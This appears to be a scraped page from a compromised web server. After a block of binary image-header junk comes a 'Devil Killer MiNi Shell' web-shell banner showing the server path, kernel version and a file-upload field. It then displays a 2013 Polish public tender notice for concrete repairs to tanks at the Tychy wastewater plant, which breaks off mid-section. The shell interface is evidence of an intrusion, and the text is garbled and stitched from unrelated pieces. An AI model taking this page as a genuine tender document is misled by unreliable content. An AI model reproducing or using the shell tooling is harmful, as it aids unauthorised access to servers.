JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/151471-N-2013.html

<p class="kh_header"><b>Tychy: Remont osadnika wstępnego, zbiornika osadu surowego oraz zbiornika pompowni C-TECH</b><br>
<b>Numer ogłoszenia: 151471 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspakajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont osadnika wstępnego, zbiornika osadu surowego oraz zbiornika pompowni C-TECH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1.Część 1 zamówienia - Remont osadnika wstępnego (obiekt 10A) 
a)naprawa rys i pęknięć na ścianie zbiornika, ok. 30m,
b)remont płyty dennej, ok. 1215m2,
c)naprawa styków dylatacyjnych w ścianie i płycie dennej, ok. 136m,
d)wymiana uszkodzonej konstrukcji bieżni wraz z jej reprofilacją ok. 180m2 do pokrycia żywicami ok. 57m2 powierzchni bieżni w rzucie górnym (Wariant A) lub wymiana uszkodzonej konstrukcji bieżni poprzez montaż prefabrykatów polimerobetonowych oraz reprofilacji pozostałej części grzybka bieżni (Wariant B), 
e)reprofilacja koryta obiegowego, ok. 65m2, w tym ok. 5m2 reprofilacji koryta obiegowego,
f)malowanie konstrukcji żelbetowych ok. 260m2.
2. Część 2 zamówienia - Remont zbiornika osadu surowego (obiekt 12) i zbiornika pompowni C-TECH (obiekt 301)
a)naprawa rys i pęknięć ścian zbiornika osadu surowego, ok. 18m,
b)naprawa konstrukcji betonowej ścian zbiornika osadu surowego, ok. 78m2,
c)remont płyty przykrywającej zbiornika osadu surowego, ok. 14 m2,
d)naprawę konstrukcji betonowej ścian zbiornika pompowni C-TECH powyżej zwierciadła ścieków, ok. 41m2,
e)malowanie zbiornika pompowni C-TECH poniżej zwierciadła ścieków, ok. 50m2.
Szczegółowy opis zamówienia znajduje się w Załączniku nr 8 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.91.00-8, 45.11.13.00-1, 45.26.23.30-3, 45.26.23.40-6, 45.26.23.30-3, 45.26.23.00-4, 45.26.26.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do złożenia oferty Wykonawca winien wnieść wadium w wysokości: - dla części 1 zamówienia: 4 500 PLN - dla części 2 zamówienia: 500 PLN, - łącznie na cześć 1 i 2 zamówienia: 5000 złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli: -złoży wypełnione i podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - dla części 1-2 zamówienia; W celu potwierdzenia spełnienia w/w warunku Wykonawca zobowiązany jest złożyć wraz z ofertą wypełnione i podpisane oświadczenie - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli: -złoży wypełnione i podpisane oświadczenie, iż posiada w zakresie niniejszego zamówienia niezbędną wiedzę i doświadczenie - dla części 1-2 zamówienia; 
o	dla części 1 zamówienia -potwierdzi wykonanie co najmniej jednej roboty budowlanej o wartości nie mniejszej niż 40 000,00 zł netto polegającej na remoncie/wymianie bieżni w osadniku radialnym na terenie oczyszczalni ścieków w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wraz z podaniem jej rodzaju, wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy robota ta została wykonana w sposób należyty oraz wskazujących, czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona - wzór wykazu stanowi załącznik nr 3A do niniejszej SIWZ. 
o	dla części 2 zamówienia -potwierdzi wykonanie co najmniej jednej roboty budowlanej polegającej na reprofilacji konstrukcji betonowych zbiorników o powierzchni minimum 100m2, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wraz z podaniem jej rodzaju, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy robota ta została wykonana w sposób należyty oraz wskazujących, czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona - wzór wykazu stanowi załącznik nr 3B do niniejszej SIWZ. 
o	Dowody dot. części 1-2 zamówienia: Dowody określające, że robota została wykonana w sposób należyty oraz została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona stanowią poświadczenia. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, wówczas przedkłada inne dokumenty. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, zgodnie z załącznikiem nr 3C. W celu potwierdzenia spełnienia w/w warunku Wykonawca zobowiązany jest złożyć wraz z ofertą wykaz robót, zgodnie z załącznikami nr 3A,3B do siwz wraz z dokumentem potwierdzającym, że wykazana robota została wykonana w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona oraz wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli: -złoży wypełnione i podpisane oświadczenie, iż dysponuje odpowiednim potencjałem technicznym do wykonania niniejszego zamówienia - załącznik nr 2 do SIWZ - dla części 1-2 zamówienia; W celu potwierdzenia spełniania w/w warunków Wykonawca składający ofertę na części 1 i 2 zamówienia zobowiązany jest złożyć wraz z ofertą: - wypełnione i podpisane oświadczenie - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli: -złoży wypełnione i podpisane oświadczenie, iż dysponuje osobami zdolnymi do wykonania niniejszego zamówienia oraz wykaże, iż dysponuje: 
o	dla części 1 zamówienia -kierownikiem robót, posiadającym uprawnienia budowlane w specjalności konstrukcyjnej lub równoważnej, umożliwiającej kierowanie robotami budowlanymi odpowiednimi dla zakresu zadania na terenie oczyszczalni ścieków, posiadającym doświadczenie polegające na wymianie/remoncie bieżni osadnika radialnego. Dopuszcza się łączenie funkcji kierownika w części 1 i 2 zamówienia. 
o	dla części 2 zamówienia -kierownikiem robót, posiadającym uprawnienia budowlane w specjalności konstrukcyjnej lub równoważnej, umożliwiającej kierowanie robotami budowlanymi na terenie oczyszczalni ścieków odpowiednimi dla zakresu zadania, posiadającym doświadczenie polegające na reprofilacji konstrukcji żelbetowych. 
o	Dopuszcza się łączenie funkcji kierownika w części 1 i 2 zamówienia. W celu potwierdzenia spełniania w/w warunku Zamawiający wymaga złożenia przez Wykonawcę wypełnionych i podpisanych oświadczeń: - załączniki nr 2 i 4 do SIWZ - dla części 1-2 zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (osobami) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (osób) na okres korzystania z nich przy wykonaniu zamówienia zgodnie z Załącznikiem nr 4A. Kierownicy robót przed podpisaniem umowy przekażą Zamawiającemu kopię nadania w/w uprawnień wraz zaświadczeniem, o którym mowa w art.12 ust.7 ustawy z dnia 7 lipca 1995 Prawo budowlane (Dz.U. z 2006 Nr 156 poz. 1118 z późniejszymi zmianami)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli: -złoży wraz z ofertą wypełnione i podpisane oświadczenie, iż znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej realizację niniejszego zamówienia - załącznik nr 2 do SIWZ - dla części 1-2 zamówienia; -potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż: 
o	1)110 000,00 zł dla części 1 zamówienia; 
o	2)40 000,00 zł dla części 2 zamówienia, 
o	3)150 000,00 zł łącznie dla części 1-2 zamówienia. 
o	Wykonawca może polegać na zdolnościach finansowych oraz sytuacji ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, zgodnie z załącznikiem nr 6 do SIWZ. Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa w art. 22 ust.1 pkt.4 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia, oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga przedłożenia: - informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej dotyczącej tych podmiotów, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającej, iż podmioty te posiadają środki finansowe lub zdolność kredytową w wysokości nie mniejszej 1)110 000,00 zł dla części 1 zamówienia; 2)40 000,00 zł dla części 2 zamówienia, 3)150 000,00 zł łącznie dla części 1-2 zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że materiały planowane do zastosowania spełniają wymogi określone w załączniku nr 8 do SIWZ (Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji projektowej), Wykonawca musi złożyć: 
1) Wykaz materiałów planowanych do zastosowania podczas realizacji Umowy na Remont osadnika, zbiornika osadu surowego oraz zbiornika pompowni C-TECH na terenie Oczyszczalni Ścieków Tychy - Urbanowice - załącznik nr 10 do SIWZ (dot. części 1 i 2 zamówienia): 
2) W przypadku wymiany uszkodzonej konstrukcji bieżni przez Wykonawcę w części 1 poprzez zastosowanie wariantu B - zwymiarowanego rysunku planowanego do zastosowania przez Wykonawcę prefabrykatu podczas realizacji zamówienia. 
3) karty techniczne/atesty/certyfikaty dla materiałów planowanych do zastosowania dla każdego typu robót: Dla Wykonawców składających ofertę na cześć 1 zamówienia. a) zaprawa sczepna do reprofilacji bieżni (dla Wariantu A oraz dla B - o ile zaplanowana technologia przewiduje replofilację boków bieżni ) b) zaprawa naprawcza do reprofilacji bieżni (dla Wariantu A oraz dla B- o ile zaplanowana technologia przewiduje replofilację boków bieżni) c) prefabrykat polimerobetonowy (dla Wariantu B) d) klej do montażu prefabrykatu polimerobetonowego (dla Wariantu B) e) klej/uszczelniacz do wypełnienia fug pomiędzy prefabrykatem polimerobetonowym (dla Wariantu B); f) zabezpieczenie antykorozyjne podkładowe konstrukcji betonowych, g) zabezpieczenie antykorozyjne wierzchnie konstrukcji betonowych, h) kit trwale plastyczny planowany do zastosowania w wypełnieniu dylatacji, i) materiał na warstwę odporną na ścieranie do zastosowania na dnie zbiornika. 
Dla Wykonawców składających ofertę na cześć 2 zamówienia. a) zaprawa sczepna do reprofilacji ścian, b) zaprawa naprawcza do reprofilacji ścian, c) zabezpieczenie antykorozyjne podkładowe konstrukcji betonowych, d) zabezpieczenie antykorozyjne wierzchnie konstrukcji betonowych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów - załącznik nr 9 do SIWZ. Upoważnienie należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 
2. Wypełniony przedmiar robót - znajdujący się w załączniku nr 8 do SIWZ. Brak wypełnionego Przedmiaru Robót w ofercie spowoduje odrzucenie oferty Wykonawcy z postępowania. 
3. Pisemne zobowiązanie innego podmiotu w zakresie wiedzy i doświadczenia - załącznik nr 3A do SIWZ. 
4. Pisemne zobowiązanie innego podmiotu w zakresie osób zdolnych do wykonania zamówienia - załącznik nr 4A do SIWZ. 
5. Informacja Wykonawcy o braku podstaw do wykluczenia z postępowania - załącznik nr 5A do SIWZ. 
6. Pisemne zobowiązanie innego podmiotu w zakresie sytuacji ekonomicznej i finansowej załącznik nr 6 do SIWZ. 
7. Dokument potwierdzający wniesienie wadium zgodnie z pkt. IX. ppkt 1. SIWZ. 
8. Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie dokumentu w niewłaściwej formie (np. nieaktualne bądź niepoświadczone przez Wykonawcę za zgodność z oryginałem odpisy lub kopie) spowoduje wykluczenie Wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3. u.p,z.p. 
9. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając: pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, zgodnie z załącznikami do niniejszej siwz (zobowiązania należy złożyć w oryginale).W sytuacji, gdy podmioty te będą brały udział w realizacji części zamówienia Wykonawca składa: a) oświadczenie o braku podstaw do wykluczenia - dla każdego z tych podmiotów, b) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt.2 u.p.z.p., wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dla każdego z tych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
